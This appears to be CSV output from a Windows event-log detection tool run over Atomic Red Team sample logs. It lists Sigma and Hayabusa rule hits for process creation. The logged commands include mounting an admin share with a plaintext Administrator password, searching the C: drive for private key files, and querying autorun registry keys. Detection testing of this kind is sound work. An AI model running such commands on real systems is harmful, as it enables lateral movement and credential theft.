2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: net  use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator  :  Path: C:\Windows\System32\net.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: cmd.exe  /c  net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:41.109 +09:00,MSEDGEWIN10,1,medium,Mounted Windows Admin Shares with net.exe,,rules/sigma/process_creation/win_net_use_admin_share.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:46.238 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.466 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""echo "" ""ATOMICREDTEAM > %%windir%%\cert.key""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.524 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\cmd.exe  /S /D /c"" dir c:\ /b /s .key ""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.557 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: findstr  /e .key  :  Path: C:\Windows\System32\findstr.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""dir c:\ /b /s .key | findstr /e .key""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:48:57.570 +09:00,MSEDGEWIN10,1,medium,Discover Private Keys,,rules/sigma/process_creation/process_creation_discover_private_keys.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:31.690 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c   :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.150 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query  HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query "" HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.180 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.227 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.249 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.304 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.335 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.413 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.463 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.497 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.551 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.585 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.660 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.678 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.728 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.743 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.789 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.807 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.850 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.868 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.921 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.937 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.975 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:32.990 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.036 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.059 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.147 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.175 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.251 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.331 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.375 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.392 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.559 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: powershell",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: reg  Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run  :  Path: C:\Windows\System32\reg.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: ""C:\Windows\system32\cmd.exe"" /c ""reg Query HKLM\Software\Microsoft\Windows\CurrentVersion\Run""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
2019-07-19 23:49:33.572 +09:00,MSEDGEWIN10,1,low,Query Registry,,rules/sigma/process_creation/win_query_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx
